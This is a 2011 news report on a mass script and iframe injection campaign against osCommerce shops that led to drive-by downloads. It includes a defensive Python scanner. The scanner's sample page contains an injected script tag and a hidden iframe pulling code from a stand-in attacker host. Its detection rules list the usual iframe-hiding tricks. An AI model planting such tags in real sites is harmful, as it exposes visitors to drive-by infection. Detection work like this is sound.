Jul 27, 2011 09:35 GMT

Security researchers from web application security provider Armorize have come across a new mass injection attack targeting osCommerce websites that has already infected more than 90,000 pages.

Attackers began by injecting a hidden iframe pointing to a malicious URL, but later switched to a script element that loads a malicious JavaScript file from an external domain.

The injected code doesn't seem to be obfuscated, so searching for it on Google revealed over 90,000 hits, indicating this attack is widespread.
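Both injection shapes described above, a hidden iframe and a script tag that pulls JavaScript from a host the site does not control, are easy to pick out of a page's HTML when the code is not obfuscated. The following scanner is an added example written for this article, not code from Armorize or the osCommerce project; the trusted hostnames, the sample page and the attacker hostname (`attacker-host.invalid`) are all constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts allowed to serve scripts and frames for this shop (constructed allowlist;
# a real deployment would list its own domain and CDN).
TRUSTED_HOSTS = {"shop.example", "cdn.shop.example"}


class InjectionScanner(HTMLParser):
    """Collect <iframe> and <script> tags that look like injected content."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = trusted_hosts
        self.findings = []  # list of (kind, src) tuples in document order

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            # An iframe is suspicious if it is hidden OR points off-site.
            if self._is_hidden(a) or self._is_external(a.get("src")):
                self.findings.append(("hidden-or-external-iframe", a.get("src", "")))
        elif tag == "script":
            src = a.get("src")
            if src and self._is_external(src):
                self.findings.append(("external-script", src))

    def _is_external(self, src):
        """True when src names a host outside the allowlist.

        Relative paths have no hostname and are treated as local; protocol-relative
        URLs such as //host/x.js are parsed with the host as netloc.
        """
        if not src:
            return False
        host = urlparse(src).hostname
        return host is not None and host not in self.trusted_hosts

    @staticmethod
    def _is_hidden(a):
        """Detect the usual ways an injected iframe is kept out of sight."""
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            return True
        if "width:0" in style or "height:0" in style:
            return True
        # Zero or one-pixel width/height attributes are another common trick.
        for dim in ("width", "height"):
            v = a.get(dim)
            if v is not None and v.strip().lower().rstrip("px") in ("0", "1"):
                return True
        return False


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Return the suspicious tags found in an HTML document."""
    p = InjectionScanner(trusted_hosts)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page: one legitimate local script, one trusted CDN script,
# one injected external script, one hidden off-site iframe, one normal iframe.
SAMPLE_PAGE = """<html><head>
<script src="/js/shop.js"></script>
<script src="http://cdn.shop.example/jquery.js"></script>
<script src="http://attacker-host.invalid/inject.js"></script>
</head><body>
<h1>Catalog</h1>
<iframe src="http://attacker-host.invalid/landing.html" width="0" height="0" style="display:none"></iframe>
<iframe src="https://shop.example/help" width="600" height="400"></iframe>
</body></html>"""


if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {src}")
```

Running the script against the sample page reports the injected script and the hidden iframe and stays silent on the local and allowlisted resources. The same `scan_html` function can be pointed at saved copies of a shop's pages as a periodic integrity check; the allowlist is the only piece that needs adapting per site.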

Both versions of the injection take visitors through several redirects until landing them on a page that loads exploits for vulnerabilities in browser plug-ins and popular applications.

This type of attack, known as a drive-by download, is very dangerous because it requires no user interaction and there is usually little to no indication that something malicious has happened.

According to the Armorize researchers, this attack exploits vulnerabilities in Java (CVE-2010-0840 and CVE-2010-0886), Adobe Reader (CVE-2010-0188), Internet Explorer (CVE-2006-0003) and Windows XP (CVE-2010-1885).

Given that all of these vulnerabilities are quite old, users who keep their software and operating system up to date should be protected against the attack.

osCommerce is one of the most popular e-commerce platforms, but it has very long gaps between releases. The current version of the software is 3.0 and was released at the end of March, but the previous release dated from 2008.

In order to prevent injection attacks, osCommerce users are advised to follow several instructions to strengthen the security of their installations and to install several specialized extensions.

However, many webmasters have never bothered going through these steps, leaving a large number of websites vulnerable to hackers. A post on the osCommerce support forum aggregates many of the security tips available for the platform.